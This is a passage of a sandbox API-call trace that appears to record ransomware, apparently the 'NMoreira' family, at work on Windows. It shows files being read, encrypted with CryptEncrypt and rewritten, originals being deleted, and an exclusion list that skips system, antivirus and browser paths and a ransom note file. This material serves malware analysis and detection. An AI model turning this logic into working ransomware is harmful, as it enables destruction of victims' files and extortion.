lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.541] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.541] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.541] GetLastError () returned 0x0 [0167.541] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.541] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 1 [0167.541] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb")) returned 0 [0167.542] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" [0167.542] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.542] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX207.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx207.tmp")) returned 0x207 [0167.543] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX207.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx207.tmp"), dwFlags=0x1) returned 0 [0167.543] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX207.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx207.tmp")) returned 1 [0167.543] CryptDestroyKey (hKey=0x9ad178) returned 1 [0167.543] wcslen (_String="OK") returned 0x2 [0167.543] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.543] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.543] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0167.543] CryptDestroyHash (hHash=0x9ad238) returned 1 [0167.543] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0167.543] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*NMCRYPT") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.exe") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.dll") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.lnk") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.bat") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.ini") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.msi") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*.scf") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*AppData*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\java\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\windows\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*Atheros*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*Realtek*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*bootmgr*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*boot*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*boot*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*IO.SYS*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*ntldr*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*chrome*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*opera*") returned 0 [0167.544] PathMatchSpecW (pszFile="msado27.tlb", pszSpec="*firefox*") returned 0 [0167.544] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", pszSpec="*") returned 1 [0167.544] strlen (_Str="NMoreira") returned 0x8 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] 